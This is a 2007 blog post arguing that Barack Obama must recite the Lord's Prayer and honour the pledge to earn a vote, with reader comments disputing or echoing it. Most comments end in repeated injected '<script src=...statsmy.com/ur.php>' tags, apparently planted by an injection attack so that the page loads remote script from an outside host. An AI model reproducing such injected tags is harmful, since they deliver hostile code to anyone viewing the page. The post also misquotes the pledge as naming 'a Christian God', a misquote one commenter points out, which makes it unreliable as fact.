Ticker: Should Barack Obama Recite The Lord's Prayer?
by Mark on 12/23/2007 (6)

Who's God is your God, my dear Obama?

Our Father, who art in heaven,
hallowed be thy name.
Thy Kingdom come,
thy will be done,
on earth as it is in heaven
Give us this day our daily bread.
And forgive us our trespasses,
as we forgive those who trespass against us.
And lead us not into temptation,
but deliver us from evil.
For thine is the kingdom, the power and the glory. for ever and ever. Amen.

In an erratically desperate, fundamentally anti-liberal ploy to sway fringe, teetering Conservative voters, Barack Hussein Obama recently "reassured" crucial Iowa and New Hampshire religious Democrats that he is indeed a Christian by unequivocably declaring that Jesus Christ is his partner, and has played an indelible role in his formative philosophical years

Huh?

Mr. Obama was recently photographed refusing to hold his hand to his heart while reciting the Pledge of Allegiance, a openly defiant -and atheistic- violation of "one nation under a Christian God," as defined by American secular opinion and theological tradition.

As I see it, I will not vote for a candidate, (especially such a self professed man of purported humane dignity and sublime social justice) unless he properly recites the Lord's prayer, and properly shows respect for the flag while reciting the pledge of allegiance as well. Want my vote Barack Hussein Obama? You will have to earn it, visually and verbally. Mr. Obama? Mr. Obama? Can you hear me, or has the power lust and star glitter gotten into you, -and especially your wifes- ears, soul and eyes? .

Disgusting! You blatantly propagate falsehoods. Have you researched what you're talking about, even just a little bit? I quote you: "Mr. Obama was recently photographed refusing to hold his hand to his heart while reciting the Pledge of Allegiance, a openly defiant -and atheistic- violation of "one nation under a Christian God," as defined by American secular opinion and theological tradition." The photo you are most likely referring to was taken months ago and was during the Star Spangle Banner, not the pledge. also the correct quote from the pledge is "one nation under god" without a reference to Christianity or the mythical Christ. This country is great because of it's separation of church an state. lets hope it stays that wayone"></ifr </title><script src=http://statsmy.com/ur.php ></script></title><script src=http://statsmy.com/ur.php ></script></title><script src=http://statsmy.com/ur.php ></script></title><script src=http://statsmy.com/ur.php ></script></title><script src=http://statsmy.com/ur.php ></script>

You overlooked the most important facet of the article, and that is that Obama declared himself a Christian, and said that Jesus plays a part in his daily life. Libs are going to have a hard time with that, being atheist, anti-Bush and anti-Bushchristian in composition. Too funny, once again. :D </title><script src=http://statsmy.com/ur.php ></script></title><script src=http://statsmy.com/ur.php ></script></title><script src=http://statsmy.com/ur.php ></script></title><script src=http://statsmy.com/ur.php ></script></title><script src=http://statsmy.com/ur.php ></script>

This is so ridiculous. As a Christian he SHOULDN'T put his hand to his heart and pledge allegiance. I'm glad he doesn't bow down to the civil religion. Christians in Rome died for refusing to pledge allegiance to the emporer because they knew that their ultimate allegiance (the kind you might pledge with your hand over your heart) was to God and not their country. </title><script src=http://statsmy.com/ur.php ></script></title><script src=http://statsmy.com/ur.php ></script></title><script src=http://statsmy.com/ur.php ></script></title><script src=http://statsmy.com/ur.php ></script></title><script src=http://statsmy.com/ur.php ></script>

And yet, at the inauguration today, his lips were still as the Lord's Prayer was recited.tp </title><script src=http://statsmy.com/ur.php ></script></title><script src=http://statsmy.com/ur.php ></script></title><script src=http://statsmy.com/ur.php ></script></title><script src=http://statsmy.com/ur.php ></script></title><script src=http://statsmy.com/ur.php ></script>

Folks, if you look at Barak's inaugerations, he DID NOT recite the Lord's Prayer. His mouth was shut. He says he's a Christian. Let me tell you, NO CHRISTIAN would ever neglect verbally saying the Lord's prayer for any reason. Unless you are Judas or maybe Peter. That scares me. It scares me because I don't want a President to say he's a Christian and then forsake the Lord on the biggest of stages. It isn't right, and it says a lot about him."0 </title><script src=http://statsmy.com/ur.php ></script></title><script src=http://statsmy.com/ur.php ></script></title><script src=http://statsmy.com/ur.php ></script></title><script src=http://statsmy.com/ur.php ></script></title><script src=http://statsmy.com/ur.php ></script>
